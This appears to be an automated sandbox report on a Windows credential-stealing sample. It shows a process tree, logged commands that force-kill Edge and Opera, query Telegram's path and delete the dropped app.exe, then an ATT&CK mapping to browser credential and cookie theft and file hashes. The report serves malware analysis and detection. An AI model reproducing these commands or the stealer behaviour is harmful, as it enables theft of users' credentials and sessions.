        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5912,i,15331715260363271791,7090159762376673197,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5908 /prefetch:8
        5⤵
        
        PID:5080
    - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5912,i,15331715260363271791,7090159762376673197,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5908 /prefetch:8
        5⤵
        
        PID:3240
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=6048,i,15331715260363271791,7090159762376673197,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5708 /prefetch:8
        5⤵
        
        PID:4148
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=6168,i,15331715260363271791,7090159762376673197,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=6164 /prefetch:8
        5⤵
        
        PID:1180
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=6196,i,15331715260363271791,7090159762376673197,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=6188 /prefetch:8
        5⤵
        
        PID:2044
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=6136,i,15331715260363271791,7090159762376673197,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5736 /prefetch:8
        5⤵
        
        PID:536
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=6444,i,15331715260363271791,7090159762376673197,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=6252 /prefetch:8
        5⤵
        
        PID:4700
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=6436,i,15331715260363271791,7090159762376673197,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=6432 /prefetch:8
        5⤵
        
        PID:1652
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=6188,i,15331715260363271791,7090159762376673197,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=6756 /prefetch:8
        5⤵
        
        PID:3440
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=6460,i,15331715260363271791,7090159762376673197,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=6748 /prefetch:8
        5⤵
        
        PID:1456
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM msedge.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2708
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM opera.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:536
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM opera.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:456
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" process where name='Telegram.exe' get ExecutablePath
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:216
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /C del /F /Q "C:\Users\Admin\AppData\Roaming\app.exe"
      4⤵
      PID:2400

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:2452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3316

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:2708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Modify Authentication Process

T1556

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Authentication Process

T1556

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\5d2d44df-2bd0-412f-962a-ec6ff53e2269.tmp

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
80KB

MD5
e2227e22ab4a60129ab2fcaebbbfe104

SHA1
9f9836df2601f8fbc3e8a0773fdd05f9b55c8794

SHA256
29ae5967859334ed2f9d0db96bc767dcf0b2d33049d2fe778384d865831d6ac5

SHA512
3fbbb55d0faabfc2e4f736921d9a9b1b962df33a156a0cf40e6e1aa03ffda7ec166f08644e2c0bbe72463e2cb154fd357ff1d0682d31bcfa30c1027fb4c43381

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
4facd0ff10154cde70c99baa7df81001

SHA1
65267ea75bcb63edd2905e288d7b96b543708205

SHA256
a13534df0cd0a79a3a1b91085a6d575b47d5a9aad7fc6d712fd2616c0e95a23b

SHA512
ad8d2b965851c0ddc23e92ae151b3b0b2bcda850c446f4278bdb0754d6b42ead8fc034b394749578a27b33ad7e4ab0633f974dfd4773fbe4d93ae477f00b73f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
049e5a246ed025dee243db0ba8e2984c

SHA1
15ec2d2b28dcfc17c1cfb5d0c13482d0706f942d

SHA256
33071ca42c472861a2fabd0f82f8b03ef0daaa6796b24b83f3df02587e4c3d12

SHA512
bc5f6fa6a8cae20ab40eae4552650d75f38ebb158c95288a79d9f332623bb507946513c39d19c00a5aee323df01f0f1a51c54594ef1c293289baf45f4ae2145b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
69KB

MD5
164a788f50529fc93a6077e50675c617

SHA1
c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48

SHA256
b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17

SHA512
ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\content.js

Filesize
9KB

MD5
3d20584f7f6c8eac79e17cca4207fb79

SHA1
3c16dcc27ae52431c8cdd92fbaab0341524d3092

SHA256
0d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643

SHA512
315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

Filesize
107KB

MD5
40e2018187b61af5be8caf035fb72882

SHA1
72a0b7bcb454b6b727bf90da35879b3e9a70621e

SHA256
b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5

SHA512
a21b8f3f7d646909d6aed605ad5823269f52fda1255aa9bb4d4643e165a7b11935572bf9e0a6a324874f99c20a6f3b6d1e457c7ccd30adcac83c15febc063d12

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\cc742e8e-8d86-4c2c-a946-d520a388195f\index-dir\the-real-index

Filesize
648B

MD5
fa2c9359afcf119c37589dcc4f57f3a0

SHA1
41c629776c5a49c00e3c5b8dc3a41a0b0fa0f937

SHA256
1f5b297eeaebffb374f31e8ac86ae497b8d41e566e7fa88ac0eedba500c403d9

SHA512
2a4893be83eb5c765c6375fcbcf5a9596736cb37efdaaa7270c64d837ea5614228ed5d64f335ae4fe5c5bf9d6b46ac4569d4fc198cd5b648f6c2c7be8519d2eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\cc742e8e-8d86-4c2c-a946-d520a388195f\index-dir\the-real-index~RFe5970f0.TMP

Filesize
648B

MD5
be9644cb213fdca285e6645f6c846243

SHA1
326d3e4be5c95c09a4f024613a3e6c8d9d1ca1ee

SHA256
4141e2048a13de679a90c87b8bb0e57c14c22e5cffd4241b972028809968b8a7

SHA512
a46b73b3cfd7e248bca579ab1f0f4970d16a6e9f52dbf61102f8f33a2f57897b718d336b5f6852b5865813f0161ff7df668f5e03a77ec9290538bbebc92eaf06

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

Filesize
4KB

MD5
a80a97979d49fa51b28e4654299cb16b

SHA1
00349db56dc83ed443ad3e1b83484ea91e895f95

SHA256
4988f2907e7577fe09ee496b8435b42db744d0c48bc7f624f1b8780984a38928

SHA512
399a8f27cb355e7ee11fbd4cf3943cd6dcd6cbcd0898687492e84362e8aedf3aaf7a401de5737bccae159c24ff096d255f7e9e35a1caac448fa0afa9a447096b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\favorites_diagnostic.log

Filesize
1KB

MD5
48d3d1bf5445328afcd2e06ddac77184

SHA1
ff5992657775a381e1b0fa98e8220619942fa0ba

SHA256
957ef830f4c4827f343bc79c5651e132105558aba404b3f57296362f26b3d645

SHA512
ac4058b12f9938027e8f49eab7b911290cf23806676be369686741464b9fbcd793fae71c130be73eef4039514af59b6f223b8cf339fe9b45d089768bcaf865db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
7KB

MD5
c44fc0acd72b8de2ab00e4ef226c8140

SHA1
2825eba26754fa0aa2dc8fed0c59abb33a5389f7

SHA256
a48294293e8f2d2aa42d85d9b81ec47e4badcfc268b3a51458bcfe811fdb87ab

SHA512
e2d7f48cd4beadb04f9f55cd6412556f5f016298ed4701cc093558b368ee19081c4208b0d572d324756ef24c29cbaf22148fcdfcaa6b0c031e60d4822f1018d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
6KB

MD5
985f03f3ea4b9c716fb3a50680a98ea8

SHA1
93d5f56bb30df6ec5900e2f062e75749551a4eca

SHA256
ac7fdddcc3e6512dbb605c04ead9627cfa10cd2f4dbc13bf397ce4f085a0e97f

SHA512
076b6579394083237887dbe22b3bb88c21e1ac4df05c0ca8633726e8735e41904ae99f64c5848390cf282b02be01d4774e2935f0b66ffeb09d04182822d7e80f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Filesize
2KB

MD5
f1a7cd1b8db6757536debfbca3abb6f3

SHA1
c43e250e5c3d410d85db36d041112dab7f40b61f

SHA256
1bb7562470bb4643f5406089e0f77c7e6d549982b9767a48526867992ab0bb52

SHA512
bf35ff0479f7cd8c76de4b860e6aac69f504c692dd11f87b0f576f1f4b43c416a321345bf09375ed97a33ab9233c7526f30f4a281e9c476af42c1f118d023288

Download Submit
C:\Users\Admin\AppData\Local\Temp\15362b23-1e36-4623-af14-875b158fcf3d.tmp

Filesize
10KB

MD5
78e47dda17341bed7be45dccfd89ac87

SHA1
1afde30e46997452d11e4a2adbbf35cce7a1404f

SHA256
67d161098be68cd24febc0c7b48f515f199dda72f20ae3bbb97fcf2542bb0550

SHA512
9574a66d3756540479dc955c4057144283e09cae11ce11ebce801053bb48e536e67dc823b91895a9e3ee8d3cb27c065d5e9030c39a26cbf3f201348385b418a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\319ae482-ae83-4b1d-a9e8-2d5d1b77e3ed.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aeeop4t0.irx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir4960_530745827\220007fa-0047-4361-a420-a396072fb97c.tmp

Filesize
152KB

MD5
dd9bf8448d3ddcfd067967f01e8bf6d7

SHA1
d7829475b2bd6a3baa8fabfaf39af57c6439b35e

SHA256
fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72

SHA512
65347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de

Download Submit
C:\Users\Admin\AppData\Roaming\app.exe

Filesize
5.2MB

MD5
8ea58397d964057052986278d405149f

SHA1
c8cb8079a15ee16d75944d8294f7a3ddea6a45a0

SHA256
c36158adc569642d18d273201b38eb5f35debdeb95ca02d52df3f18b853a12e9

SHA512
5fcd8070767773d76bd6c7dd03bd431cf41e48f874c98a2cf2534ab76ba889a7144293aef66a7492586d6d3ccadf5a9f237d6ddb9fa360c5cd5670df89eb0787

Download Submit
memory/980-26-0x00007FFFB3D10000-0x00007FFFB47D1000-memory.dmp

Filesize
10.8MB

Download
memory/980-15-0x00007FFFB3D10000-0x00007FFFB47D1000-memory.dmp

Filesize
10.8MB

Download
memory/980-14-0x00007FFFB3D10000-0x00007FFFB47D1000-memory.dmp

Filesize
10.8MB

Download
memory/980-0-0x00007FFFB3D13000-0x00007FFFB3D15000-memory.dmp

Filesize
8KB

Download
memory/980-13-0x00007FFFB3D13000-0x00007FFFB3D15000-memory.dmp

Filesize
8KB

Download
memory/980-12-0x00007FFFB3D10000-0x00007FFFB47D1000-memory.dmp

Filesize
10.8MB

Download
memory/980-11-0x00007FFFB3D10000-0x00007FFFB47D1000-memory.dmp

Filesize
10.8MB

Download
memory/980-10-0x00000128B55D0000-0x00000128B55F2000-memory.dmp

Filesize
136KB

Download